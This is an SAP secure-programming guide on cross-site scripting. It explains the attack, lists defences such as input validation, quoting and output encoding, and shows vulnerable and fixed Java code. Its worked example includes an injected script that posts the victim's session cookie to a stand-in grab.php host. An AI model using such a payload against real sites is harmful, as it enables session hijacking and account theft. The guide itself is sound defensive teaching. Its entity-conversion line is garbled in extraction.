Cross-Site Scripting (XSS) (SAP Library - Secure Programming) (81233D54D8C744C09B4434BABF7B0879)

Description
Cross-Site Scripting (XSS) attacks set out to manipulate HTML pages by injecting malicious script code or by other indirect techniques, such as redirection to another server, or logical attacks such as replacing images or changing style sheets. Attackers look for HTML pages where user input is written back to the HTML page, for example, during a logon failure the logon screen is displayed a second time. These examples demonstrate the potential security vulnerabilities for XSS attacks, if user input is written back to the HTML page. Due to the fact that HTML is based on tags, the browser may even interpret and execute Javascript or ActiveX controls, which might contain malicious SCRIPT commands. Those commands are executed by someone else opening this manipulated HTML page. The consequences of ActiveX attacks are as follows:

The hacker might read/change/delete files on some other users local drives. Application actions might be executed under some other users privileges. The hacker might install other applications like Trojan horses.

In the case of Java or VBscript, potential attacks may be:

To send the browser into an endless loop. To redirect the browser to a different page by overwriting the document.location.hrefproperty. To access all user inputs (credit card numbers, and so on) and to send it to a rogue server. To access the users cookies (session hijacking, cookie manipulation).

Generated by Jive SBS on 2011-01-11+01:00 1

Cross-Site Scripting (XSS) (SAP Library - Secure Programming) (81233D54D8C744C09B4434BABF7B0879)

To insert new Script tags as output between tags, which, for example, create new event handlers that are executed when certain events occur.

Examples
Example Code 1 <a href="javascript:alert();">Click me!</a> Example Code 2 <img src="filename" onclick="alert();"> Example Code 3 <textarea onchange="alert();">

What Do I Need to Do?

The basic rules to avoid XSS attacks are:

Constrain Input: Define a codepage (such as charset = ISO-8859-1) to clearly decide which characters are problematic. Filter metacharacters depending on the interpreter (HTML, browser, file system, and so on). Restrict variables to those characters that are explicitly allowed. Canonicalization, that is, before validating input you first have to bring it to an appropriate standard form. For more details on this topic, see Canonicalization. Validate Input: All external input should be validated: For field length For data type For range (such as date, postcode) For a white list, to accept only known unproblematic characters If users are allowed to enter a URL within the input field, restrict the domain of the URL and permit only the selection of approved URLs. Always enclose input values on HTML pages in quotation marks. This ensures, that attacks are only possible if hackers leave the input value context (for example, HUGO), embedded in quotation marks, using

Generated by Jive SBS on 2011-01-11+01:00 2

Cross-Site Scripting (XSS) (SAP Library - Secure Programming) (81233D54D8C744C09B4434BABF7B0879)

another ". Malicious code can be detected with a simple manner filtering for ". Example <form name="HUGO"> <input type="text" name="user" value="30"> </form> Omitting the quotation mark will make an XSS attack easier, because attackers do not have to leave the context by setting any quotation mark ("). Therefore, it is much more difficult to filter malicious code out of such HTML pages.

Bad Example <form name=HUGO> <input type=text name=user value=30> </form>

Encode output: Encode user supplied output so that any inserted scripts are prevented from being transmitted to users in an executable form. Convert metacharacters, such as < to < , > to > , and to &quot; depending on the output context. Use the Output Encoding Framework, which is provided by the SAP NetWeaver platform.

Example
Part of the Companys Intranet Application public void doContent(...) { ... String s; if ((s = getUsernameByID("userid")) != null) { response.write("<br>Applicant:<u>" + s + "</u>");

Generated by Jive SBS on 2011-01-11+01:00 3

Cross-Site Scripting (XSS) (SAP Library - Secure Programming) (81233D54D8C744C09B4434BABF7B0879)

} ... } Supposed Output <br>Applicant:<u>Smith</u> Cross-Site Scripting (XSS) Example Attack Data entered in the field "user name" <script> document.write(' <form name=hack method=post action="http://www.example.org/grab.php"> <input type=hidden name=sid value="' + escape(document.cookie) + '">'); document.hack.submit(); </script> Smith Cross-Site Scripting (XSS) Attack Result HTML output containing the applicants input, rendered in the companys intranet <br>Applicant:<u> <script>document.write( <formname=hackmethod=post action="http://www.example.org/grab.php"> <inputtype=hiddenname=sidvalue=">'+ escape(document.cookie)+'">'); document.hack.submit();</script> Smith </u> Visible Output

Generated by Jive SBS on 2011-01-11+01:00 4

Cross-Site Scripting (XSS) (SAP Library - Secure Programming) (81233D54D8C744C09B4434BABF7B0879)

Applicant: Smith Cross-Site Scripting (XSS) Secure Code Security enhanced function: public void doContent(...) { ... String s; if ((s = getUsernameByID("userid")) != null) { s = StringUtils.encodeToHTML(s, 50); response.write("<br>Applicant:<u>" + s + "</u>"); } ... }

What Do I Get from the SAP NetWeaver Platform?

The possibilities available with the SAP NetWeaver platform depend on the type of application you are using. See:

Using SAP Output Encoding Framework Using BSP-Extensions (HTMLB, XHTMLB and PHTMLB) ITS and BusinessHTML (BHTML) Web Dynpro for ABAP

Further Information
See Further Information on Cross-Site Scripting.

Generated by Jive SBS on 2011-01-11+01:00 5